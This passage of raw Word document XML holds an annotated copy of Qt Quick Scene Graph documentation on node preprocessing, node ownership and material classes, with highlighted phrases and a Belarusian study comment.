      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() function.</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For more details, see the</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1984" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Scene Graph - Custom Geometry</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="009F0E57">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1614" w:name="preprocessing"/>
      <w:bookmarkStart w:id="1615" w:name="_Toc483000881"/>
      <w:bookmarkStart w:id="1616" w:name="_Toc483604225"/>
      <w:bookmarkStart w:id="1617" w:name="_Toc483605445"/>
      <w:bookmarkEnd w:id="1614"/>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preprocessing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1615"/>
      <w:bookmarkEnd w:id="1616"/>
      <w:bookmarkEnd w:id="1617"/>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Nodes have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>virtual</w:t>
      </w:r>
      <w:r w:rsidR="009F0E57">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1985" w:anchor="preprocess" w:history="1">
        <w:r w:rsidRPr="00C207C4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGNode::preprocess</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function, which will be c</w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alled before the scene graph is rendered</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Node subclasses can set the flag</w:t>
      </w:r>
      <w:r w:rsidR="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1986" w:anchor="Flag-enum" w:history="1">
        <w:r w:rsidRPr="00C207C4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGNode::UsePreprocess</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and override the</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1987" w:anchor="preprocess" w:history="1">
        <w:r w:rsidRPr="001113FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGNode::preprocess</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() function to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>do final preparation</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of their node. For </w:t>
      </w:r>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, dividing a bezier curve into the correct level of detail for the current scale factor or updating a section of a texture.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="009F0E57">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1618" w:name="node-ownership"/>
      <w:bookmarkStart w:id="1619" w:name="_Toc483000882"/>
      <w:bookmarkStart w:id="1620" w:name="_Toc483604226"/>
      <w:bookmarkStart w:id="1621" w:name="_Toc483605446"/>
      <w:bookmarkEnd w:id="1618"/>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Node Ownership</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1619"/>
      <w:bookmarkEnd w:id="1620"/>
      <w:bookmarkEnd w:id="1621"/>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="009F0E57" w:rsidRDefault="001113FB" w:rsidP="001113FB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Ownership of the nodes is either done </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>explicitly by the creator</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>by the scene graph</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by setting the flag</w:t>
      </w:r>
      <w:r w:rsidR="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1988" w:anchor="Flag-enum" w:history="1">
        <w:r w:rsidRPr="00C207C4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGNode::OwnedByParent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Assigning ownership to the scene graph is </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>often preferable as it simplifies cleanup</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the scene graph lives outside the GUI thread.</w:t>
      </w:r>
      <w:r w:rsidR="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F0E57" w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00C207C4" w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Лепей зразумець, што такое клін ап.</w:t>
      </w:r>
      <w:r w:rsidR="009F0E57" w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001113FB" w:rsidRPr="001113FB" w:rsidRDefault="001113FB" w:rsidP="009F0E57">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1622" w:name="materials"/>
      <w:bookmarkStart w:id="1623" w:name="_Toc483000883"/>
      <w:bookmarkStart w:id="1624" w:name="_Toc483003874"/>
      <w:bookmarkStart w:id="1625" w:name="_Toc483604227"/>
      <w:bookmarkStart w:id="1626" w:name="_Toc483605447"/>
      <w:bookmarkEnd w:id="1622"/>
      <w:r w:rsidRPr="009F0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Materials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1623"/>
      <w:bookmarkEnd w:id="1624"/>
      <w:bookmarkEnd w:id="1625"/>
      <w:bookmarkEnd w:id="1626"/>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w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>material describes how the interior of a geometry in a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1989" w:history="1">
        <w:r w:rsidRPr="00C207C4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometryNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is filled</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encapsulates an OpenGL shader program</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides ample flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in what can be achieved, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>though most of the Qt Quick items themselves only use very basic materials</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, such </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as solid color</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>texture fills</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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For users who just want to apply </w:t>
      </w:r>
      <w:r w:rsidRPr="00C207C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>custom shading to a QML Item type</w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, it is possible to do this directly in QML using the</w:t>
      </w:r>
      <w:r w:rsidR="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1990" w:history="1">
        <w:r w:rsidRPr="00C207C4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ShaderEffect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C207C4">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type.</w:t>
      </w:r>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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001113FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Below is a complete list of material classes:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9597"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928"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="00C207C4">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490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1991" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="00C207C4">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGMaterial</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Encapsulates rendering state for a shader program</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="00C207C4">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490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1992" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="00C207C4">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGMaterialShader</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Represents an OpenGL shader program in the renderer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="00C207C4">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C207C4" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
            </w:pPr>
            <w:hyperlink r:id="rId1993" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="00C207C4">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="auto"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGMaterialType</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 xml:space="preserve">Used as a unique type token in combination with </w:t>
            </w:r>
            <w:r w:rsidRPr="001113FB">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>QSGMaterial</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="00C207C4">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490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1994" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="00C207C4">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGFlatColorMaterial</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Convenient way of rendering solid colored geometry in the scene graph</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="00C207C4">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4F7B6E" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1995" w:history="1">
              <w:r w:rsidR="001113FB" w:rsidRPr="004F7B6E">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="FF0000"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>QSGSimpleMaterial</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Template generated class used to store the state used with a QSGSimpleMateralShader</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001113FB" w:rsidRPr="002230B8" w:rsidTr="00C207C4">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490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
